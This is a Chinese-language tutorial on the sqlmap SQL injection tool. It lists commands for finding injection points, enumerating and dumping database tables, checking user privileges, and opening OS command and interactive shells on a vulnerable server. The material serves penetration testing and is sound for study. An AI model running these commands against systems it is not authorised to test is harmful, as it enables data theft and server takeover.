SQL注入神器 SqlMap

2021-10-14 15:12:52 字數 2881 閱讀 2437

sqlmap是乙個開源的滲透測試工具,可以自動檢測和利用sql漏洞,並且在sectools.org注入工具中一直排名第一。

sqlmap分配有乙個強大的搜尋引擎,如果url存在注入漏洞,它就可以從資料庫中直接提取資料,如果資料庫使用者許可權較大的話甚至可以直接執行作業系統的一些命令、讀取檔案。

sqlmap是使用python進行編寫的,所以任何一台安裝了python的操作兄台那個都可以使用它。

其特點如下:

使用環境:kali、python3。

要實現的功能

注入語法

簡單講解

注入點探測

sqlmap -u "url"使用-u指定url進行探測,如果存在注入點,將會顯示web容器和資料庫版本

獲取資料庫

sqlmap -u "url" --dbs使用--dbs引數獲取所有資料庫名

檢視當前資料庫

sqlmap -u "url" --current-db使用--current-db引數獲取當前程式所用資料庫

列出資料庫所有表

sqlmap -u "url" --table -d "database_name"--table引數獲取資料表,-d引數指定資料庫

讀取表中欄位名

sqlmap -u "url" --columns -t "table_name" -d "database_name"使用--columns引數獲取欄位名,-t引數指定表名

讀取字段內容

sqlmap -u "url" --dump -c "column1,column2column3" -t "[table_name]" -d "database_name"--dump意為轉存資料,-c指定欄位名

資料探測到之後,sqlmap會將資料轉存到csqlmap/output目錄下,檔案以table.cvs儲存。

sqlmap中的引數對於sql漏洞測試來說至關重要,只有一一了解了相關引數,才能更好的使用sqlmap並了解其強大之處。

1)測試注入點許可權

sqlmap -u "url"


--privileges                //測試所有使用者許可權


sqlmap -u "url"


--privileges -u sa          //測試sa使用者許可權
2)執行shell命令

sqlmap -u "url"


--os-cmd=


"ipconfig"


//執行ipconfig命令


sqlmap -u "url"


--os-shell                  //執行系統互動的shell
3)執行sql命令

sqlmap -u "url"


--sql-shell                //返回sql互動的shell,可以執行sql語句


sqlmap -u "url"


--sql-query=


"sql_commond"


//執行的單一sql語句
4)使用post提交方式

sqlmap -u "url"


--data "post引數"
5)設定顯示詳細等級

sqlmap -u "url"


--dbs -v 1
sqlmap中 -v引數設定了7個等級:

6)注入http請求頭

sqlmap -u "url"


-r head.txt --dbs     的內容為http請求頭
7)直接連線資料庫

sqlmap -d "mysql:"


--dbs
8)設定注入等級

sqlmap -u "url"


--level 3


//注入等級共有5個,預設為1
9) 補充引數

1、 sqlmap -u "url"


--data="id=1"   //把注入的引數以post放回寺提交


2、 sqlmap -u "url"


--cookie    //當web需要登入是通過抓包獲取cookie值,用於登入


3、 sqlmap -u "url"


--random-agent   //該引數會從sqlmap/txt/user-agent檔案紅隨機產生user-agent。當 level>=3才會去檢查user-agent頭是否存在注入漏洞


4、其他引數:


--users 列資料庫管理使用者,當前使用者有許可權讀取包含所有使用者的表的許可權時,就可以列出所有管理使用者。


--current-user 在大多資料庫中可以獲取到管理資料的使用者。


--is-dba 判斷當前的使用者是否為管理,是的話會返回true。


--proxy 指定乙個**伺服器 eg: –proxy http://***xx:8080

注入神器 sqlmap

01 注入原理 存在注入的原因是因為後台在編寫程式時,沒有對使用者輸入的資料做過濾導致的,正如事實上,不是所有的使用者都是友好的 比如 使用者在某個輸入框提交的引數是 2 瀏覽器提交的url為 http www.com index.php?id 2 伺服器後台執行sql語句 select from ...

SQL注入神器 sqlmap的常用引數 方法總結

sqlmap是一款開源的自動化sql注入工具,是集獲取資料庫資訊 獲取主機許可權 讀寫檔案和提權等功能於一身的強大注入工具。mysql oracle postgresql microsoft sql server microsoft access ibm db2 sqlite firebird sy...

SQL注入之Sqlmap使用

我們都知道,對於網路滲透最重要的一步是要拿到後台資料庫管理員的密碼與使用者名稱,那麼怎麼得到這個使用者名稱和密碼呢?就要用到今天所說的sqlmap,它不僅適用於內網環境,在外網環境也是非常受歡迎的,並且在kali linux裡邊顯得尤為重要,它所到之處幾乎是 寸草不生 那麼接下來我就簡單介紹下sql...